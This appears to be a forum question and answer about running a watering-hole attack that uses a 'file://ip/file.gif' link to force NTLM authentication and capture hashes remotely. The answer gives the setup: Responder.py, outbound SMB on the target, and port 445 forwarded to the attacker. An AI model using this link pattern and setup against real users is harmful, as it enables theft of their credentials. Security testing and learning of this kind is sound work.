Watering Hole Website NTLM Steal Attack
I'm trying to recreate a Watering hole SMB theft attack where you send a victim a link to your website containing code like "file://ip/file.gif" Causing forced authentication which passes the NTLM hash I have the code which executes the process (check reference links)
But how can I retrieve/steal the NTLM hash back over the internet remotely without being on the local network?
This process can be done locally very easily but I'm struggling with finding an NTLM listener to use over the internet remotely on a website
For this kind of attack you could use for example Responder.py Please, bare in mind that in order to make it work over the internet it would be necessary to:
- Enable outbound SMB connections on the server that you plan to attack.
- NAT the port 445 on the attacker computer and ensure that no firewall is blocking it.
Once those two conditions are true you can now configure Responder.py to enable a SMB server and after that start Responder.py.
Now you just need to test it accessing it.
Please, do not forget to close everything back once you have finished playing!